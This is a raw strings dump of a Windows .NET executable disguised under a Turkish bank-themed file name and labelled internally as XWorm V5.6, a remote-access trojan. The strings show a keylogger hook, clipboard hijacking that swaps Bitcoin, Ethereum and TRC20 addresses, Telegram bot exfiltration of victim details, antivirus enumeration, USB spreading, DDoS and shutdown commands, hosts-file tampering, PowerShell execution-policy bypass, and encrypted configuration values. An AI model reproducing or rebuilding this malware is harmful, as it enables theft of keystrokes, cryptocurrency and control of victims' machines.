!This program cannot be run in DOS mode.
`.rsrc
@.reloc
3j %(1
v4.0.30319
#Strings
<Module>
mscorlib
Microsoft.VisualBasic
MyApplication
MyComputer
MyProject
MyWebServices
ThreadSafeObjectProvider`1
Settings
ClientSocket
Messages
Uninstaller
XLogger
Clipper
ClipboardFunc
ClipboardNotification
AlgorithmAES
Helper
LowLevelKeyboardProc
NativeMethods
NotificationForm
LASTINPUTINFO
EXECUTION_STATE
Microsoft.VisualBasic.ApplicationServices
ApplicationBase
Microsoft.VisualBasic.Devices
Computer
System
Object
.cctor
get_Computer
m_ComputerObjectProvider
get_Application
m_AppObjectProvider
get_User
m_UserObjectProvider
get_WebServices
m_MyWebServicesObjectProvider
Application
WebServices
Equals
GetHashCode
GetType
ToString
Create__Instance__
instance
Dispose__Instance__
get_GetInstance
m_ThreadStaticValue
GetInstance
InstallDir
InstallStr
LoggerPath
ChatID
SendBot
isConnected
System.Net.Sockets
Socket
BufferLength
Buffer
System.IO
MemoryStream
System.Threading
ManualResetEvent
allDone
SendSync
Interval
ActivatePong
BeginConnect
ConnectServer
INDATE
Spread
Antivirus
IAsyncResult
BeginReceive
BeginRead
EndSend
isDisconnected
Plugin
SendMSG
SendError
Thread
ReportWindow
Monitoring
OpenUrl
Hidden
capCreateCaptureWindowA
lpszWindowName
dwStyle
nWidth
nHeight
hwndParent
Handle
capGetDriverDescriptionA
wDriver
lpszName
cbName
lpszVer
RunDisk
Extension
Memory
buffer
IsUpdate
CurrentActiveWindowTitle
SetHook
HookCallback
wParam
lParam
KeyboardLayout
vkCode
GetActiveWindowTitle
WM_KEYDOWN
_hookID
SetWindowsHookEx
idHook
dwThreadId
UnhookWindowsHookEx
CallNextHookEx
GetModuleHandle
lpModuleName
WHKEYBOARDLL
GetForegroundWindow
GetWindowThreadProcessId
lpdwProcessId
GetKeyState
keyCode
GetKeyboardState
lpKeyState
GetKeyboardLayout
idThread
System.Text
StringBuilder
ToUnicodeEx
wVirtKey
wScanCode
pwszBuff
cchBuff
wFlags
MapVirtualKey
uMapType
System.Text.RegularExpressions
BTCRegex
ETHRegex
TRCRegex
GetText
SetText
Decrypt
ProcessDpi
SetProcessDpiAwareness
awareness
IsValidDomainName
FileStream
fileStream
Alphabet
Random
current
GetRandomString
length
GetLastInputInfo
idletime
lastInputInf
GetLastInputTime
TimeSpan
sumofidletime
LastLastIdletime
LastAct
userAgents
GetWindowText
SetThreadExecutionState
esFlags
PreventSleep
GetHashT
strToHash
SetValue
GetValue
Decompress
Compress
AES_Encryptor
AES_Decryptor
_appMutex
CreateMutex
CloseMutex
MulticastDelegate
TargetObject
TargetMethod
AsyncCallback
BeginInvoke
DelegateCallback
DelegateAsyncState
EndInvoke
DelegateAsyncResult
Invoke
AddClipboardFormatListener
SetParent
hWndChild
hWndNewParent
intpreclp
System.Windows.Forms
currentClipboard
RegexResult
pattern
Message
WndProc
CreateParams
get_CreateParams
ValueType
cbSize
dwTime
value__
ES_CONTINUOUS
ES_DISPLAY_REQUIRED
ES_SYSTEM_REQUIRED
System.ComponentModel
EditorBrowsableAttribute
EditorBrowsableState
System.CodeDom.Compiler
GeneratedCodeAttribute
System.Diagnostics
DebuggerHiddenAttribute
Microsoft.VisualBasic.CompilerServices
StandardModuleAttribute
HideModuleNameAttribute
System.ComponentModel.Design
HelpKeywordAttribute
System.Runtime.CompilerServices
RuntimeHelpers
GetObjectValue
RuntimeTypeHandle
GetTypeFromHandle
Activator
CreateInstance
MyGroupCollectionAttribute
System.Runtime.InteropServices
ComVisibleAttribute
ThreadStaticAttribute
CompilerGeneratedAttribute
Interaction
Environ
String
Concat
VB$AnonymousDelegate_0
_Lambda$__1
_Lambda$__2
_Lambda$__3
_Lambda$__4
DebuggerDisplayAttribute
DebuggerStepThroughAttribute
Exception
FileInfo
Conversions
Environment
ExpandEnvironmentVariables
ProjectData
SetProjectError
ClearProjectError
DirectoryInfo
get_Directory
get_FullName
Directory
Exists
CreateDirectory
Delete
ReadAllBytes
WriteAllBytes
SpecialFolder
GetFolderPath
GetFileNameWithoutExtension
CreateObject
Boolean
NewLateBinding
LateGet
ChangeType
LateSetComplex
LateCall
FileMode
ThreadStart
System.Net
WebClient
ServicePointManager
set_Expect100Continue
SecurityProtocolType
set_SecurityProtocol
set_DefaultConnectionLimit
get_NewLine
get_UserName
ServerComputer
ComputerInfo
get_Info
get_OSFullName
DownloadString
IDisposable
Dispose
WaitHandle
WaitOne
STAThreadAttribute
_Lambda$__5
_Lambda$__6
IPAddress
GetHostAddresses
TimerCallback
AddressFamily
SocketType
ProtocolType
set_ReceiveBufferSize
set_SendBufferSize
ToInteger
Connect
SocketFlags
EventWaitHandle
Replace
OperatingSystem
get_OSVersion
get_ServicePack
get_Is64BitOperatingSystem
DateTime
FileSystemInfo
get_LastWriteTime
GetFileName
Operators
CompareString
System.Security.Principal
WindowsIdentity
GetCurrent
WindowsPrincipal
WindowsBuiltInRole
IsInRole
System.Management
ManagementObjectSearcher
ManagementBaseObject
ManagementObjectCollection
ManagementObjectEnumerator
get_MachineName
GetEnumerator
get_Current
get_Item
Append
MoveNext
get_Length
Substring
ObjectQuery
ManagementObject
ConcatenateObject
get_TotalPhysicalMemory
UInt64
Conversion
Double
Remove
EndReceive
ToArray
ToLong
Stream
WriteByte
ParameterizedThreadStart
ObjectFlowControl
CheckForSyncLockOnValueType
Monitor
SelectMode
BeginSend
Collect
_Closure$__1
$VB$Local_Host
$VB$Local_Port
_Lambda$__9
_Lambda$__7
_Lambda$__8
System.Drawing
Graphics
Rectangle
Bitmap
Strings
CompareMethod
Restart
SocketShutdown
Shutdown
Convert
FromBase64String
GetTempPath
Combine
DownloadFile
Process
AppWinStyle
ReadAllText
WriteAllText
get_Message
Microsoft.VisualBasic.MyServices
RegistryProxy
get_Registry
Microsoft.Win32
RegistryKey
get_CurrentUser
DeleteSubKey
Screen
get_PrimaryScreen
get_Bounds
get_Width
get_Height
System.Drawing.Imaging
PixelFormat
FromImage
CopyPixelOperation
CopyFromScreen
GraphicsUnit
DrawImage
ImageFormat
get_Jpeg
ToBase64String
System.Reflection
MethodInfo
AppDomain
get_CurrentDomain
Assembly
GetTypes
MemberInfo
get_Name
GetMethods
ConditionalCompareObjectEqual
ToInt32
StartsWith
ToBoolean
Stopwatch
FromSeconds
get_Elapsed
op_GreaterThan
System.Collections.Generic
List`1
GetProcesses
get_MainWindowTitle
IsNullOrEmpty
ToLower
Contains
Func`2
System.Core
System.Linq
Enumerable
IEnumerable`1
HttpWebRequest
HttpWebResponse
WebRequest
Create
set_UserAgent
set_AllowAutoRedirect
set_Timeout
set_Method
WebResponse
GetResponse
ProcessStartInfo
EndsWith
ProcessWindowStyle
set_WindowStyle
set_Arguments
get_EntryPoint
MethodBase
ParameterInfo
GetParameters
Encoding
get_UTF8
GetBytes
DllImportAttribute
avicap32.dll
MarshalAsAttribute
UnmanagedType
StreamWriter
GetTempFileName
TextWriter
WriteLine
get_StartupPath
get_ExecutablePath
set_FileName
set_CreateNoWindow
set_ErrorDialog
set_UseShellExecute
IntPtr
GetCurrentProcess
get_ProcessName
op_Explicit
op_Equality
Marshal
ReadInt32
ToUInteger
UInt32
GetProcessById
IsNullOrWhiteSpace
user32.dll
kernel32.dll
OutAttribute
_Closure$__2
_Closure$__3
$VB$Local_ReturnValue
_Lambda$__10
$VB$Local_txt
_Lambda$__11
ApartmentState
SetApartmentState
Clipboard
Control
get_Handle
get_Success
get_Msg
OrObject
LateSet
System.Security.Cryptography
RijndaelManaged
ICryptoTransform
MD5CryptoServiceProvider
HashAlgorithm
ComputeHash
SymmetricAlgorithm
set_Key
CipherMode
set_Mode
CreateDecryptor
TransformFinalBlock
ProcessModule
get_MainModule
get_FileName
UriHostNameType
CheckHostName
get_Chars
SizeOf
get_TickCount
GetString
get_ProcessorCount
get_SystemDirectory
GetPathRoot
DriveInfo
get_TotalSize
get_ASCII
ToUpper
Registry
CurrentUser
RegistryKeyPermissionCheck
CreateSubKey
RegistryValueKind
BitConverter
System.IO.Compression
GZipStream
CompressionMode
SubtractObject
CreateEncryptor
SHCore.dll
StructLayoutAttribute
LayoutKind
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
GuidAttribute
AssemblyFileVersionAttribute
AssemblyTrademarkAttribute
AssemblyCopyrightAttribute
AssemblyProductAttribute
AssemblyCompanyAttribute
AssemblyDescriptionAttribute
AssemblyTitleAttribute
ziraat genel srular
ziraat genel srular.exe
MyTemplate
14.0.0.0
My.Computer
My.User
My.WebServices
My.Application
4System.Web.Services.Protocols.SoapHttpClientProtocol
Create__Instance__
Dispose__Instance__
<generated method>
<generated method>
WrapNonExceptionThrows
$35ed8dbd-972d-4201-bea1-c66ee57eca49
1.0.0.0
_CorExeMain
mscoree.dll
64a`CC
d`SQuy
<Km]2`
VmzqK<
<_TD_rl
1De~u2
:2'C@D
CAg 36
( @aB%z8
LNN`ll
<^xFI[=-
|>uU !
{%fff0
}xS(Z
!Zq$V|N
5P0yj\
7P\PZ4O9
?}+j.8
~#1)aK
!t\{5j
&; D`$
^8G!?9w
8kY)G!XY
A1E0_(
ZY"0 V
>cPNGa5
?@N&KN33>
Bd'&1p
@xy'V]
NUDN&1p
V?g2P2Y(
H31dcq
6rSC'6C
0^#gj)K
uj#okE
Fs=y+B
PG;jOZ
=cPIT=
T (Exy'
EEZBfl
XjDPI,
<,~xD0w,
D^JA)U
PJ!I2|
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
ApR8VsD+oHQ3Gt+gCfdS1pIz59FbrA3DD/xUHUrzTlk=
G0jCNYiGTD6DF1Fxc6/DsQ==
kxg5otAJnytpJc0+xr9WUA==
e0VzzFZXpzRwfN+YDnGPkg==
att4AhKTr483lJO9Q3qp7g==
qDVsbjPGepnkHBwEYymKaA==
Kn5pRS5tD2Is86YA3BZLpQ==
ywYL5RBM78tbAwI8YMUN6w==
pwivnduFRA85eQFd
\Log.tmp
66s651RbT1aq6HYO8zwA+s4HYdGlaZR+59YznjHrkQTk94UW9LRaYo184506YHh4
LdZ+ig1yMw92pc0i+qtZX8X1tG3qI+b42e+DJUjYNJaGXYVksVjd7qzEidCtFIaL
puvRhoUcjoDkiAyWxvH8NQsDXWdRV+Mk3qkA699l58632PR70T2s2/M0Yd3887oN
SlrUNzL/ZQNBFdDtYf0UEytHJfH1Yg3t3FS78vjxDW0Lq0mCkaxJDdVm2kG0sbP8
9E7BLz/KXhQ0Pb62m920IQ==
WScript.Shell
CreateShortcut
TargetPath
WorkingDirectory
[XWorm V5.6]
New Clinet :
UserName :
OSFullName :
USB :
CPU :
GPU :
RAM :
Groub :
https://api.telegram.org/bot
/sendMessage?chat_id=
&text=
Microsoft
Service Pack
dd/MM/yyy
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
SELECT * FROM Win32_VideoController
Win32_Processor.deviceid="CPU0"
Core(TM)
uninstall
update
Urlopen
Urlhide
PCShutdown
shutdown.exe /f /s /t 0
PCRestart
shutdown.exe /f /r /t 0
PCLogoff
shutdown.exe -L
RunShell
StartDDos
StopDDos
StartReport
StopReport
\drivers\etc\hosts
Shosts
HostsMSG
Modified successfully!
HostsErr
plugin
sendPlugin
savePlugin
RemovePlugins
Plugins Removed!
OfflineGet
Plugin
Invoke
RunRecovery
Recovery
RunOptions
injRun
UACFunc
Plugin Error!
ToLower
Open [
powershell.exe
-ExecutionPolicy Bypass -File "
POST / HTTP/1.1
Host:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
User-Agent:
Content-length: 5235
@echo off
timeout 3 > NUL
" /f /q
ToUpper
[SPACE]
Return
[ENTER]
Escape
LControlKey
[CTRL]
RControlKey
RShiftKey
[Shift]
LShiftKey
[Back]
Capital
[CAPSLOCK: OFF]
[CAPSLOCK: ON]
MainWindowTitle
ProcessName
\b(bc1|[13])[a-zA-HJ-NP-Z0-9]{26,45}\b
\b(0x)[a-zA-HJ-NP-Z0-9]{40,45}\b
T[A-Za-z1-9]{33}
BTC Clipper
ETH Clipper
TRC20 Clipper
ExStyle
Software\
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
abcdefghijklmnopqrstuvwxyz
Err HWID
ToArray
abcdefghijklmnopqrstuvwxyz
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
1.0.0.0
InternalName
ziraat genel srular.exe
LegalCopyright
OriginalFilename
ziraat genel srular.exe
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0